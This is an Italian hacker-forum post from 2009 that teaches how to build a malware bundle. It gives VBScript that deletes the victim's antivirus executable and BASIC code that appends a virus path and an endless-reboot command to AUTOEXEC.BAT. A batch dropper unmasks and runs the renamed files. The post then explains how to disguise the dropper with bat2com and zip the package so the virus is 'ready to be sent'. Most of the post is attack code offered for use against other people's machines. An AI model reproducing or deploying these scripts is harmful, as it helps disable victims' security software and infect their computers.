BEAST la bestia - Il Forum dell'Hacker

Le informazioni contenute in questo Forum sono esclusivamente a scopo informativo, pertanto non mi riterrò responsabile di eventuali danni provocati da un uso improprio da parte degli utenti. Declino ogni responsabilità per l’uso l’utilizzo e/o l’abuso.
 
IndiceCalendarioFAQCercaLista utentiGruppiRegistrarsiAccedi

Condividere | 
 

 Eliminare il controllo antivirus

Vedere l'argomento precedente Vedere l'argomento seguente Andare in basso 
AutoreMessaggio
Admin
Admin
avatar

Messaggi : 19
Data d'iscrizione : 04.02.09
Località : Salerno

MessaggioOggetto: Eliminare il controllo antivirus   Mer Feb 04, 2009 11:37 pm

ELIMINARE IL CONTROLLO ANTIVIRUS

Una tecnica molto laboriosa per eliminare il controllo dell'antivirus è eliminare l'antivirus!!! Semplicemente basta creare un file .VBS con il comando di trovare il file principale dell'antivirus e eliminarlo, quindi riavviare il computer ed eseguire il virus.
Come??? Così:

Citazione :

---------------------TAGLIA QUI-------------------------
---------SALVA IL FILE COME CERCA.VBS-----------

'*********************************************
'*
'*Cerca files antivirus e distruggi
'*
'* By
'*
'* {Ma$tErX}
'*
'*********************************************

Dim WSHShell
Set WSHShell = WScript.CreateObject("WScript.Shell")

Dim windir,systemdir

object = "C:\" ' Il drive in cui devi effettuare la ricerca

On Error Resume Next

Dim fso, f1, f2, s
Set fso = CreateObject("Scripting.FileSystemObject")
Set f2 = fso.GetFile(object & "\daniele\temp\inserisci_il.nome") 'Inserisci il nome del file
f2.Delete
'Nel caso non sappiate quale antivirus sia installato nel computer della vittima vi consiglio di inserire più nomi di files da cercare ed eliminare. Basta compiare per più volte il codice che si trova dopo il "On Error resume next" e prima di questo suggerimento.

Sub Welcome()
Dim intDoIt

intDoIt = MsgBox(L_Welcome_MsgBox_Message_Text, _
vbOKCancel + vbInformation, _
L_Welcome_MsgBox_Title_Text )
If intDoIt = vbCancel Then
WScript.Quit
End If
End Sub


''''''''''''''''''''''TAGLIA QUI''''''''''''''''''''''''''''''''

Rinomina il file CERCA.VBS con CERCA.VBSS

A questo punto c'è il bisogno di aggiungere una stringa nel file AUTOEXEC.BAT che apra il virus dopo il riavvio del pc. In questo caso bastano poche righe di Basic:

Taglia qui...
Citazione :

REM *********************************************
REM *
REM * Aggiugni stringhe a file autoexec.bat
REM *
REM * By
REM *
REM * {Ma$tErX}
REM *
REM *********************************************
REM RINOMINA IL FILE COME CON.BAS
10 CLS
20 OPEN ("C:\AUTOEXEC.BAT") FOR APPEND AS #1
30 PRINT #1, " " 'Inserisci tra le virgolette il nome del virus. Non dimenticarti del ' percorso se il file non si trova nella directory C:\
40 PRINT #1,"c:\windows\rundll32.exe user,exitwindows" 'Riavvia il pc all'infinito...
50 CLOSE
60 END
Taglia qui...

Dopo aver scritto il codice sorgente compila il file CON.BAS. Il risultato sarà CON.EXE. Rinomina CON.EXE COME CON.EYE

Ora manca solo un programma Smascheri(al momento giusto) ed esegua gli altri due file. Ho scelto x queste azioni un file .BAT. Il codice sorgente è il seguente:

Taglia qui...
Citazione :

@echo off
echo *********************************************>nul
echo * *>nul
echo * Rinomina i files, eseguili,cancellali e *>nul
echo * *>nul
echo * riavvia il pc. *>nul
echo * *>nul
echo * By *>nul
echo * *>nul
echo * {Ma$tErX} *>nul
echo * *>nul
echo *********************************************>nul
@echo>nul
@echo RINOMINA IL FILE SETUP.BAT>NUL
@ren CERCA.VBSS CERCA.VBS
@ren CON.EYE CON.EXE
@cerca.vbs
@con.exe
@c:\windows\rundll32.exe user,exitwindows
@exit
Taglia qui...

Anche in questo caso è meglio nascondere il codice sorgente del file SETUP.BAT. Quindi apriamo il programma bat2com e scriviamo:

bat2com SETUP.BAT

Il risultato sarà un file di nome SETUP.COM

Racchiudi tutto in una cartella con il virus. Magari racchiudi il tutto con Winzip e il tuo virus è pronto x essere inviato.
Tornare in alto Andare in basso
Vedere il profilo dell'utente http://beast.forumitalian.com
 
Eliminare il controllo antivirus
Vedere l'argomento precedente Vedere l'argomento seguente Tornare in alto 
Pagina 1 di 1
 Argomenti simili
-
» Come eliminare tutte le e-mail in pochissimi click da Hotmail
» Come eliminare o sospendere un'estensione su Google Chrome
» Come eliminare un file .exe
» Come impostare numero privato su Android
» GTA V - Assassinare i giurati (NYKK3)

Permesso di questo forum:Non puoi rispondere agli argomenti in questo forum
BEAST la bestia - Il Forum dell'Hacker :: VIRUS-
Andare verso: